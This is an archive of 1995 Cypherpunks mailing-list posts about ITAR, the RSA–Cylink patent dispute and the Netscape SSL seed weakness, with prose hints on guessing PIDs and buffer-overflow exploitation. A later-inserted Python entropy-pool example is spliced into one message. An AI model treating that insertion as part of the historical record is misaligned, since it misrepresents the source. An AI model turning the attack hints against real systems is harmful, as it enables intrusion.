In-Reply-To: <ac84f1b9250210046a05@[205.199.118.202]>
Message-ID: <811635300snx@hclb.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


In article <ac84f1b9250210046a05@[205.199.118.202]> you write:
> 
> But I also searched the text for mention of "crypto" and only came up with
> the fairly standard usage of "crypto leftist." My assumption then is that
> the meme of crypto anarchy has spread to the writer at that UK newspaper (I
> wonder if Brian Arthur has been talking to them?) and that he interprets
> FR's screed in terms of crypto anarchy?
> 

Partially true, as there was an article on the leader page in Monday's
printed edition entitled "You can't put the Internet genie back in the
bottle" by Boris Johnson.  It's probably on the ET by now, but I don't
know where.

Some quotes:

"But we make three points in defense of progress.

"The first, which has already been made, is that you can't put the genie
back in the bottle.  Next, we set against the presence of this offensive
matter [porn] the way the Internet can liberate in its sheer prolixity.
We rejoice, for instance, at how some surfer exposed the claptrap of 
L. Ron Hubbard's Scientology by publishing his "secret" texts, knowledge
of which had previously cost his disciples many thousands of pounds. We think
again of those women in the basements of Tehran, or any other place where
freedom of expression is denied.

"if there is no control over what people may read, then wherever there
are computers and telephone lines, totalitarianism will be that much
more precarious."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. M. Ellis" <kelli@zeus.towson.edu>
Date: Wed, 20 Sep 95 12:28:51 PDT
To: Ian Goldberg <cme@tis.com>
Subject: My new perspective on ITAR (was Re: Munitions shirt (again)
In-Reply-To: <199509201549.IAA19844@cuzco.CS.Berkeley.EDU>
Message-ID: <Pine.ULT.3.91.950920151359.6005A-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Sep 1995, Ian Goldberg wrote:

> So, Dave and I got free munitions shirts (they're different, though;
> the font is smaller and they have a bunch of X'd out Constitutional
> Amendments on the back; I think they were designed by Joel Furr) for
> our bug find.

Good.

> 
> So I'm wearing it today.  The thing is, I live in International House,
> a residence that has 50% non-Americans.
> 
> So, any consensus as to whether it's actually illegal to do so?  I
> remember some disagreement a few weeks ago that AFAIK wasn't resolved.
> 
> As far as I can tell, it's _technically_ illegal, but any LEO would be
> out of his mind to try to enforce it (it would have to be a Fed, too,
> wouldn't it?  Or can regular city cops get you for violating export
> restrictions?).
> 
>    - Ian
> 

Funny, this thread sounds awfully familiar.  In fact, I think I wrote 
almost this _exact same post_ about 3 weeks ago, just substituting 
"Berkeley" for "Towson State University".  I mentioned the fact that I 
live in the International House of _my_ campus, and we discussed the 
legality of my wearing it.  We hashed over it for a few days, and never 
really came to a real answer, since ITAR is rather vague in that area.

I might add, however, that two days ago I wore my RSA shirt to my sound
design class, where the guy I happened to sit down next to recognized it,
was familiar with what it stood for, and knew all about the Zimmermann
case; not because he was a crypto enthusiast or a comp sci major, but
because he works for customs at Baltimore-Washington International
Airport. 

This event really changed my point of view considering ITAR... I figured 
that it was just one of those dumb laws that _nobody_ really paid much 
attention to except for the FBI and that was only because they were 
looking for a way to nail Zimmermann for writing good crypto.  I had 
assumed that ITAR was something that customs agents/L. E. O's/etc. 
learned about, took a test on it, then forgot about it the next day.

Interesting... they _really_ are serious, aren't they?

-=me=-

kelli@zeus.towson.edu       Geek Code v3.0      http://zeus.towson.edu/~kelli/
GAT dx s++:- a-- C++ uu+++ P+ L++ E- W++ N K W--- O- M- V-- PS+++ PE- Y++(-)
PGP+>++ t+ 5 x+ R tv b+++ DI- D--- G e h* r+ z**
Diverse Sexual Orientation Coll.Towson State University DSOC@zeus.towson.edu

"All the world will be your enemy, Prince With The Thousand Enemies. . .
And whenever they catch you, they will kill you.
But first, they must catch you. . ."
                                           -Richard Adams





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Wed, 20 Sep 95 07:30:31 PDT
To: paul@poboy.b17c.ingr.com (Paul Robichaux)
Subject: Re: Cylink
Message-ID: <4454.9509201427@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Paul Robichaux <paul@poboy.b17c.ingr.com> writes:
> Andrew Loewenstern writes:
> > Any ideas on how this will change the legal status of RSAREF and PGP?
> 
> Then Perry Metzger replied:
> > I'm much more interested in how this changes the legal status of the
> > D-H derived encryption systems like ElGamal, and how it alters the
> > patent status on the DSS, which is basically also derived from the
> > same root.
> 
> What I'm waiting to see is who sues RSADSI for recovery of royalties
> paid to Cylink. Imagine how Apple, Lotus, and all of the other
> bigcorps using RSA must feel right about now: they licensed a patent
> from the wrong people, and it appears that RSADSI may have known that
> their rights had expired.

It's sooo gratifying seeing the err, ever so slightly litigious folks
from RSADSI get a dose of their own medicine.

:-)

Does it apply to RSA and hence PGP by way of RSAREF, and a claimed
general patent on PK, or was this court decision on specific DH
patents only?

If so I hope the proud new owners have better marketing sense than to
stomp on their huge advertisement of RSA, PGP.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Wed, 20 Sep 95 15:51:07 PDT
To: cypherpunks@toad.com
Subject: Re: USA Today on Fear of Credit Cards over Net
In-Reply-To: <199509201518.LAA78249@tequesta.gate.net>
Message-ID: <AL9OmyczByUU075yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199509201518.LAA78249@tequesta.gate.net>,
liberty@gate.net (Jim Ray) wrote:

> Pity they didn't ask about, "Tossing a credit card slip/carbon
> in the garbage." Dumpster-diving is still an effective, lo-tech
> attack.

Why worry about dumpster-diving?  Even credit card receipts on carbonless
NCR paper are prey to the hungry eyes of underpaid cashiers or the 
waiter who doesn't think you wrote in a big enough tip. 

A security scheme is no stronger than its weakest link.  Even with the
attack Goldberg and Wagner discovered on Netscape SSL, the weakest link
in credit card transactions lies elsewhere.  I find it curious that
USA TODAY didn't include over-the-counter credit card transactions in
its poll.

   Alan Bostick             | 
Seeking opportunity to      | If you don't like what you read in the news,
develop multimedia content. | go out and make some of your own.
Finger abostick@netcom.com  |      Scoop Nisker
for more info and PGP public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQB1AgUBMGCYtOVevBgtmhnpAQF6RgL/XrkCJe6v5v6rtUmWTgB27tSmcTTkoeGj
CXEQwDw5eHcxe0jfne/r2Y9wSkRZtb4psKIhwLDd3BxxuWhzdrhVcaTcInUV+gGo
t4i2Td883rejgqlA4xbPWcWtd5NPSC7U
=pi8V
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Wed, 20 Sep 95 15:28:22 PDT
To: perry@piermont.com
Subject: Re: "random" number seeds vs. Netscape
In-Reply-To: <199509202101.RAA05534@frankenstein.piermont.com>
Message-ID: <30609562.15FB@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:
> This is true. However, you must get 128 bits of entropy into the MD5
> -- this can be accompanied by as much junk as you like, but if there
> are at least 128 bits of entropy fed in, the MD5 process will distil
> it into what you want.

My assumption was that if we conservatively counted at least 300 bits of entropy,
we would have 128 for sure. Not very scientific, 

> You might want to read RFC 1750,

Did that. It talks about a lot of the pitfalls. Unfortunately it does not address
(nor can it realistically be expected to address) details of what to look for
on a particular version of an OS running on some particular platform.

> and examine the code PGP uses for
> doing its random generation. Clients do lots of fairly random things
> while talking to netscape (click and keyboard press times, etc) that
> can be incorporated in, along with other sources of bits. You should
> grab bits wherever you can and keep them for when you need them, as
> getting 128 bits takes a while.

Gee, I thought I pointed out that we were putting that code in as part of
the going idle.

> PC timers inherently run at Mhz speed -- they interrupt every 100th of
> a second but you can get finer resolution by querying the clock
> chip. Does Windows let you do this?

I don't know, but I'll forward this on to our PC guys. It might be a portability
problem.

> I wouldn't do that, since it forces you to have a dependency on
> executing a subprocess.

We try to be careful about dealing with the subprocess failing to run.

> Were I you, I'd capture the timer on every single keystroke and mouse
> click event and feed that in to your entropy generator a la PGP.

We are constantly trying to improve this area of our code. We are still taking
suggestions.

By the way, the security engineers are doing what we can to make sure that we
can expose as much of the seed generation algorithms as possible. There is a
chance we can get permission to post the code.

> >       System specific info such as hardware serial number or
> >       system id.

> By definition, that isn't random. Don't use it.

It doesn't hurt. It's also information that is not available to the external
eavesdropper. Other than execution time, why should I remove it from the list
of bits being fed into the hash? Successfully getting this information probably
involves physical access to the machine.

> There are other things you can mix in, besides keystroke and mouse
> timings and positions, like system call timings for things that might
> take a bit of time.

We will check this one out also. For the really low resolution clocks, the
answer will be zero most of the time. :-)

> >     Multi-user Unix machines present a special problem. There are those
> >     at Netscape that argue that anybody who has login access to your
> >     machine may as well be considered to have root access. There are
> >     enough known attacks that this is true to a large extent.  However,
> >     I think we can do better than just giving up.
> 
> I agree. Don't run on the assumption that everyone has root --
> otherwise you'll build something that produces less safety than it could.

I agree, but I have a hard time arguing with those that assert that the security
of UNIX is weak enough that given what we are doing for the patch it will
be easier to become root from a logged in account than to hack the seed.

PK
--
Philip L. Karlton			karlton@netscape.com
Principal Curmudgeon			http://www.netscape.com/people/karlton
Netscape Communications Corporation
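
[Added example, not part of the original messages and not Netscape's or PGP's code.  It sketches the accumulate-and-hash approach discussed in this thread and in Bill Stewart's message: timestamped events are mixed in as they happen, static system info is mixed in with zero entropy credit, optional sources are probed before use, and no key is released until a conservative 300-bit count is reached.  Class and function names, the per-event credit of 1 bit, and the sample values are assumptions; SHA-256 stands in for the MD5 the thread mentions.]

```python
import hashlib
import os
import time

KEY_BYTES = 16            # 128-bit session key, the size discussed in the thread
REQUIRED_ESTIMATE = 300   # conservative count wanted before trusting 128 bits


class EntropyPool:
    """Hypothetical accumulating pool; SHA-256 stands in for the thread's MD5."""

    def __init__(self, required_estimate=REQUIRED_ESTIMATE):
        self._state = hashlib.sha256()
        self._required = required_estimate
        self.credited_bits = 0
        self._outputs = 0

    def _mix(self, label, data):
        # Length-prefix both fields so ("ab", "c") and ("a", "bc") hash differently.
        for field in (label.encode("utf-8"), data):
            self._state.update(len(field).to_bytes(4, "big"))
            self._state.update(field)

    def add_static(self, label, data):
        """Mix in non-random data (serial number, host id) with zero credit."""
        self._mix(label, data)

    def add_event(self, kind, payload=b"", credit_bits=1, stamp_ns=None):
        """Mix in a keystroke, mouse or system-call event with its timestamp."""
        if stamp_ns is None:
            stamp_ns = time.perf_counter_ns()
        stamp = (stamp_ns & (2**64 - 1)).to_bytes(8, "big")
        self._mix(kind, stamp + payload)
        self.credited_bits += credit_bits

    def add_optional_source(self, path, nbytes, credit_bits):
        """Use a device or file only if it exists and is readable."""
        if not os.path.exists(path):
            return False
        try:
            with open(path, "rb") as src:
                data = src.read(nbytes)
        except OSError:
            return False
        if not data:
            return False
        self._mix(path, data)
        self.credited_bits += credit_bits
        return True

    def ready(self):
        return self.credited_bits >= self._required

    def session_key(self, plaintext_prefix=b""):
        """Return a 128-bit key; refuse while the conservative count is short."""
        if not self.ready():
            raise RuntimeError(
                "only %d of %d estimated bits collected"
                % (self.credited_bits, self._required))
        # Right-when-you-need-it input: a hash of the first chunk of plaintext,
        # mixed in with zero credit alongside everything already accumulated.
        self._mix("plaintext", hashlib.sha256(plaintext_prefix).digest())
        self._outputs += 1
        # Hash a copy with a per-output suffix and truncate, so the key handed
        # out is not the pool state itself and successive keys differ.
        out = self._state.copy()
        out.update(b"output" + self._outputs.to_bytes(4, "big"))
        return out.digest()[:KEY_BYTES]


def demo():
    """Run the pool on constructed sample input."""
    pool = EntropyPool()
    pool.add_static("hostid", b"CONSTRUCTED-SERIAL-0001")   # constructed value
    ready_on_static_only = pool.ready()
    for i in range(REQUIRED_ESTIMATE):                       # simulated keystrokes
        pool.add_event("key", bytes([65 + i % 26]))
    # Constructed path that does not exist: the probe must fail cleanly.
    used_device = pool.add_optional_source(
        "/nonexistent/constructed-audio-device", 64, 32)
    key = pool.session_key(b"GET /order HTTP/1.0")
    return ready_on_static_only, used_device, key.hex()


if __name__ == "__main__":
    print(demo())
```
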




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 20 Sep 95 12:37:53 PDT
To: cypherpunks@toad.com
Subject: Re: Please send me SSL problems...
In-Reply-To: <v02110104ac85a804545b@[204.179.132.1]>
Message-ID: <9509201937.AA00765@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Jeff, the SSL specification has a severe *architectural* problem - it
>assumes that Internet Protocols are APIs - interface standards, and that
>you can just slide a "layer" underneath without anyone noticing. Such is
>not the case - all the Internet Protocols are real protocol standards, in
>that they specify the syntax, order, and semantics of the actual bits on
>the wire. The IETF quite explicitly doesn't care about APIs - that's a host
>software issue, and it doesn't matter what the host software looks like (or
>even what the machine looks like), so long as it gets the bits on the wire
>right, according to the protocol spec. This is how the Internet can make
>very strong guarantees about interoperability.

I agree with parts of this and disagree with other parts. 

The IETF does not as a whole care about APIs. The one exception being the GSS 
API which appears to be intended as a means of circumventing ITAR. Nobody asked 
me about GSS API but a lot of people have assumed that because it comes from the 
IETF it should be the basis for the Web security protocols. I'm afraid that I 
can't see any real connection between the GSS view of the world and my own. 
Hence I find that API more of a hindrance (having to explain why not to use it) 
rather than a help.

The specific criticism of SSL, that it is layer replacement highlights a 
fundamental error made by many IETF people. The purpose of a layered protocol 
model is precisely to permit the underlying layers to be altered without 
affecting the upper layers. NNTP runs very happily on either TCP/IP or on DECnet 
for example.

Where I think SSL went wrong was in the approach taken to URLs. Rather than 
define HTTPS://foo.com/ it should specify a new transport HTTP://foo.com:80:SSL/
I think the blame for that mess should be laid at another door however. 
Basically the URI working group should have understood this issue and defined a 
syntax for handling both SSL like objects and also DECNET, ATM. This would fit 
much better with the idea of SSL as being a wrapper for an arbitrary protocol.


I think it's worth pointing out that the people working at Netscape now are a 
rather different bunch to the original team.


		Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@winternet.com>
Date: Wed, 20 Sep 95 13:38:31 PDT
To: cypherpunks@toad.com
Subject: PKP Lawsuit Settled: Both Sides Claim Victory
Message-ID: <199509202038.PAA13656@icicle>
MIME-Version: 1.0
Content-Type: text



It looks as though the PKP suit is finally over, with both sides claiming
victory.  Is the decision public?  Can someone in California get a copy of
it and find out what really was decided?

Bruce
*****************************************************************************
    SUNNYVALE, Calif.--(BUSINESS WIRE)--Sept. 18, 1995--An  Arbitration Panel
has determined that RSA Data Security Inc.  licensed software products,
practicing public-key technology to  third parties without the legal rights
necessary to the patents  covering the technology. 

   The decision, issued on Sept. 6, 1995, came in a binding  arbitration
between RSA and CYLINK Corp., which formed the  partnership known as Public
Key Partners (PKP) on April 6, 1990. The purpose of forming PKP was to
establish a security standard and  jointly license security patents to leading
vendors in the high-tech  industry. 

   CYLINK has indicated that it will enforce the binding decision  in Federal
Court. 

   "The ruling exposes every one of RSA's OEM customers -- from the time PKP
was formed in 1990 until the patents expire -- to the liability for patent
infringement," said Robert Fougner, general counsel, CYLINK. 

   "Because of the widespread interest in public key technology,  this ruling
has enormous implications for the entire high-tech  industry, impacting the
future of all electronic information  exchanges including electronic commerce
and banking.  The panel's  decision vindicates our position that RSA Security
Inc. has been  improperly licensing technology which they did not have the 
necessary rights to." 

   The fundamental patents covering public key technology (Merkle-Hellman and
Rivest-Shamir-Adleman) had been held by the PKP partnership since 1990. 
Effective Sept. 6, 1995, however, the  arbitration ruled that PKP was
dissolved and the broadest of the  public key patents (invented at Stanford
University and which cover  all known implementations of public key
technology) revert from PKP  back to CYLINK. 

   The panel further ruled that RSA Data Security Inc. could not  grant its
software customers the right to make any copies of  RSA-authored software
implementing Stanford public key technology.   

   In an order issued Sept. 12, 1995, the arbitrators said that "the intent of
the order is to clarify that to the extent a (RSA  software) licensee makes
copies of the code (whether source or  object), it is not protected as a
result of the order from a claim  that the making of such copies is a `making'
under the patent laws  upon which a claim for infringement of the Stanford
patents can be  based." 

   "Cylink will assert the rights to the Stanford patents  vigorously," said
David Morris, vice president of marketing, CYLINK. "The investors of public
key cryptography, especially Martin Hellman  of Stanford University, have
never gotten a fair return for their  ground breaking invention.  Since the
formation of PKP, RSA Data  Security Inc. had been granting software rights
which allowed  licensees to copy and modify the programs, but without paying
PKP or  the inventors a royalty for those rights."  

Arbitration Ruling  

   The Stanford University patents include the Hellman-Merkle  patent, the
first public key patent making the broadest claim of  cryptography, a security
technique that ensures privacy,  authentication and the integrity of
electronic information.  Because  the Hellman-Merkle patent claims cover all
implementations of public  key techniques, including the techniques known as
RSA. 

   To avoid risk of a patent infringement suit under the Stanford  patents,
any vendor who has purchased a license from RSA since April  6, 1990, or is
contemplating the purchase of an RSA license and is  distributing software or
hardware covered by the Stanford University  patents, must now obtain a
license to the Hellman-Merkle patent from  CYLINK for their continued use. 
Customers who would like to contact  CYLINK about existing and future licenses
should call Robert  Fougner, General Counsel, at 408/735-5800.  

Background Information:    
   On April 6, 1990, RSA and CYLINK formed PKP to establish a  security
standard, and jointly license security patents to leading  vendors in the
high-tech industry.  The security technology business  is unusual in that it
is based on patents to which only these two  companies have rights. 

   The patents originally developed at Stanford University (Diffie-Hellman,
Hellman-Merkle and Hellman-Pohlig) broadly claim the invention of public-key
cryptography.  Another patent, invented at MIT (Rivest-Shamir-Adleman) claims
a particular implementation of public key cryptography using the algorithm
known as "RSA." 

   In 1994, CYLINK initiated the arbitration against RSA, claiming  that RSA's
licensing practices exceeded RSA's rights under the  patents and violated the
agreements forming PKP.  CYLINK further  claimed that it was denied a promised
license to the RSA patent when  PKP was formed.  Among other rulings, the
arbitrators ruled that an  April 1990 document grants CYLINK a patent license
to the RSA  patent. 

   CYLINK Corp. is the world's largest provider of enterprise-wide  network
information security products and wireless communications.   Headquartered in
Sunnyvale, CYLINK serves Fortune 500 companies,  multinational financial
institutions and many international  government agencies.  

   --30--crd/sf* jar/sf  

CONTACT:  

Cylink Corporation, Sunnyvale 

Kim Rose, 408/774-6447
***************************************************************************
    REDWOOD CITY, Calif.--(BUSINESS WIRE)--Sept. 19, 1995--An  Arbitration
Panel recently ruled that Cylink does not have a license  to RSA patented
technology, that RSA's software licensing practices  do not breach any
agreement with Cylink or its wholly owned  subsidiary Caro-Kann and that RSA
now has the exclusive right to  license the RSA patent.   

   In a Sept. 6, 1995 ruling, an Arbitration Panel, formed by  agreement of
the parties, and after nearly a month of testimony,  ruled in favor of RSA on
every significant issue.  The Panel held  that neither Cylink nor Caro-Kann
had a license to practice RSA  patented technology.  Cylink admittedly
incorporates this technology  in its Secure X.25 product line, without any
license to do so.   

   The Panel also found that RSA's software licensing practices did  not
materially breach any of Cylink's rights.  The Panel did not rule that anyone,
(specifically including RSA and its software customers)  infringed any
existing patent rights of anyone - including Cylink.   

   As a result of the Panel's ruling, RSA now has the exclusive  right to
license the patented RSA technology.  According to Jim  Bidzos, the President
of RSA, "RSA will continue to conduct its  software business in exactly the
same way that it has for the past  ten years.   

   "In addition, RSA anticipates that licenses to the RSA Patent will now be
much more readily available, because they can now be granted without
Cylink interference.  RSA has all of the intellectual property rights which it
needs to license its software.  RSA will  vigorously defend against any claim
to the contrary."   

   A recent Cylink press release on the Ruling of the Arbitration  Panel is
wildly inaccurate.  The same Robert Fougner (Cylink's  General Counsel) who is
cited in the Cylink press release has  repeatedly made express representations
to third parties that the  Stanford Patents do not cover, and are not
infringed by, the  manufacture, use or sale of products incorporating RSA's
TIPEM  software developer's toolkit.   

   As noted by Mr. Bidzos: "Cylink lost every single significant  issue in the
Arbitration.  Their press release was simply an attempt  to cover up what has
been a crushing defeat."   

   Questions regarding the Arbitration Panel Ruling or RSA licenses  should be
directed to Kurt Stammberger, RSA Technology Marketing  Manager, or Paul
Livesay, RSA Director of Legal Affairs.    

   --30--as/sf*  

CONTACT:  

RSA 

Kurt Stammberger, 415/595-8782 

kurt@rsa.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jordan@Heuristicrat.COM (Jordan M. Hayes)
Date: Wed, 20 Sep 95 15:47:32 PDT
To: cypherpunks@toad.com
Subject: Re:  RSA Prevails In Arbitration Against Cylink
Message-ID: <9509202241.AA00756@euclid.Heuristicrat.COM>
MIME-Version: 1.0
Content-Type: text/plain


	From baldwin@RSA.COM Wed Sep 20 09:09:30 1995

	Here's an article on the RSA-Cylink arbitration from the
	business wire.

[ ... elided -JMH ]

Just a note for those who aren't aware, Business Wire is a pay-per-use
"news release" service.  That is, RSA wrote the contents of what Bob
(Hi!) posted.

The clue is at the bottom of the "story":

	CONTACT: RSA
	Kurt Stammberger, 415/595-8782
	kurt@rsa.com

This is not to say anything pro or con about the content of the press
release; just that it wasn't written by a third party.

/jordan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Wed, 20 Sep 95 12:49:09 PDT
To: cypherpunks@toad.com
Subject: Re: Munitions shirt (again)
Message-ID: <199509201945.PAA54022@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Ian Goldberg wrote:

<snip>

>>So, any consensus as to whether it's actually illegal to do so?  I
>>remember some disagreement a few weeks ago that AFAIK wasn't resolved.

And Tim replied:

>The _consensus_ here seems to be: "This t-shirt is illegal to wear in front
>of non-Americans," judging by the comments here.

And since _I_ started all this trouble with a private e-mail to Futplex;
I'll now jump in saying again, [IANAL]: "This t-shirt may or may not be
illegal to wear in front of non-Americans," from my reading a while back
of the dense text of this silly law, [I'll spare all of you a quote of
it, but there's text that MIGHT be interpreted that way.]

>The _reality_ is quite different, I think, and the "this shirt is illegal"
>hype is, in my opinion, just that, hyperbole.

I agree with Tim that actual enforcement of this silly law is unlikely,
especially in Ian's case right now, and *especially* during our US
(election) "silly season," for obvious reasons.

The availability of strong encryption is unlikely to be a major issue
during this election cycle, despite Cypherpunk efforts, and enforcement
of this dumb law would be a "gift" to those of us who think it should be.
[I hope I'm wrong here, but I think you're safe, Ian.:)]

>Even hyperbull, too.

I wouldn't go *that* far, though. Poorly written, ambiguous, statist<g>
laws can be interpreted in any number of ways and for a variety of
reasons having little (or nothing) to do with justice. <sigh>
JMR

<snip>


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

-----END PGP SIGNATURE-----
Regards, Jim Ray

 "Not everything that is faced can be changed, but nothing can be
        changed until it is faced."  --  James Baldwin
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James Milton Ray   <liberty@gate.net>
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Wed, 20 Sep 95 12:23:51 PDT
To: goedel@tezcat.com (Dietrich J. Kappe)
Subject: Re: Cypherpunks Press release
In-Reply-To: <v01510106ac85ee814baa@[206.1.161.4]>
Message-ID: <m0svVCn-0009yxC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> We've seen the word "hacker" kicked around rather arbitrarily in the press.
> Are we to conclude that the cypherpunks are a bunch of hackers? I think it's
> time for some cypherpunks spin. How about a logo *and* a press release? The
> press release would give contacts (email, phone, etc.) so that someone on
> this list would be contacted by journalists when a crypto story breaks.
> 
> If we get enough volunteers, we can fax blanket every newspaper, station,
> and network in the world.
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> -----END PGP SIGNATURE-----
> 
> Dietrich Kappe | Red Planet    http://www.redweb.com
> Red Planet, LLC| "Chess Space" | "MS Access Products" |  PGP Public Key
> 1-800-RED 0 WEB|    /chess     |       /cobre         | /goedel/key.txt
> Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84

(<Sigh> hate to suggest this, but someone has to throw the idea out.)
We could always threaten to sue for defamation...
(You can fill in any one of a number of differences between
the canonical cypherpunk vs. hacker/cracker.)

Specify the clarification has to include logo.

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.:Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 20 Sep 95 13:04:05 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: netscape bug
In-Reply-To: <199509201855.LAA17261@netcom16.netcom.com>
Message-ID: <199509202002.QAA05425@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Vladimir Z. Nuri" writes:
> none of the articles mention that the cracker must have login access
> to the computer that the random numbers are generated on. is this true?
> does the code require knowledge of the PID etc. that can only be obtained
> by a login to the system that the netscape session is running on?

You can guess the PID without much trouble -- they are 15 bit numbers.

> P.M. notes that anywhere there is a data-driven buffer overflow (which
> he suspects are all over netscape) he can get code to execute anything
> he wants. this reminds me of the
> Morris internet worm that ran exactly the same way.

That was one of the first wide exploits of the trick, yes.

> my question: I have not seen the specifics of how this works. does
> this require specialized knowledge of the native machine language on the 
> host machine?

Yes. However, it's very straightforward to do.

The recent syslog(3) problem was of this nature, by the way.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Wed, 20 Sep 95 14:06:30 PDT
To: cypherpunks@toad.com
Subject: Netscape closes up 1 3/8 today!
Message-ID: <199509202104.OAA16664@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Lookit that! 416 trades and 11 times there was more
buying pressure than selling pressure..

The rumors of bug fix are outweighing the facts of the crack!

I am totally amazed! But think company insiders are probably
supporting the stock.  Holding up better than ascii armor, it is. 


NSCP is currently trading at $54 3/4 

Symbol        : NSCP        Exchange    : NASDAQ

Description   : NETSCAPE COMMUNICATIONS CORP COM             

Last Traded at: 54 3/4      Date/Time   : Sep 20  4:01   
$ Change      : 1 3/8       % Change    : 2.576113    

Bid           : 54 3/4      Ask         : 55 1/4      
Volume        : 310500      # of Trades : 416         
Opening Price : 53 1/2      Last Shares : 8           
Day Low       : 53 1/4      Day High    : 55 1/4      
52 Week Low   : 45 3/4      52 Week High: 74 3/4  
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: LFWS37A@prodigy.com (MR STEVE R KELL)
Date: Wed, 20 Sep 95 13:56:42 PDT
To: cypherpunks@toad.com
Subject: software
Message-ID: <013.01607783.LFWS37A@prodigy.com>
MIME-Version: 1.0
Content-Type: text/plain


I need new crypt software w/instruction if possible.

lfws37a@prodigy.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 20 Sep 95 13:16:18 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: cypherpunks press releases/contact list: YES!! DO IT!!
In-Reply-To: <199509201928.MAA20230@netcom16.netcom.com>
Message-ID: <199509202015.QAA05462@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Vladimir Z. Nuri" writes:
> I'm going to argue against TCM and others who are opposed to a 
> "cypherpunk press release" because this is not an "organized group".

Look, L. (may I call you L.?) --

we've gone over this many times. We aren't a group. We're a mailing
list. We've got a diversity of opinions, and we have no organization
-- nor do we want one.

> anyone who wants to issue press releases for the "cypherpunks", I say,
> GO FOR IT.

Except for the fact that it would more or less be a lie. There is no
"cypherpunks" position, so you can't release anything on the subject. 

> this is such a great idea that *I* may do it if nobody does it after
> a week or two.

I thought your last attempts at such stuff were dismal failures.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 20 Sep 95 07:25:24 PDT
To: cypherpunks@toad.com
Subject: Banks and Netscape InSec
Message-ID: <199509201425.QAA22671@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Financial Times, September 20, 1995, p. 12.


Banks' Security Chains Failed

The Citibank case has highlighted weaknesses in corporate
security measures.

By John Mason


Could it happen to us? Banks have been soul-searching about
their security systems in response to the alleged computer
hacking fraud on Citibank, in which $10m (6.49m pounds) is
said to have been removed from client accounts by a young
Russian based in St Petersburg.

In public, banks express confidence in their computer
security. "It's a shame what happened at Citibank, but it
couldn't happen here," is a typical response.

However, some industry insiders are concerned that many banks
and other commercial organisations are still leaving
themselves dangerously open to attack by hackers. Rumours of
some banks not admitting to similar breaches only increase
doubts.

The full technical picture of what allegedly happened at
Citibank is unclear. The largest US bank, unsurprisingly, is
reluctant to reveal precisely how Mr Vladimir Levin --
apparently without inside help -- allegedly breached its Wall
Street security system from his personal computer in St
Petersburg. A UK court will today decide whether to extradite
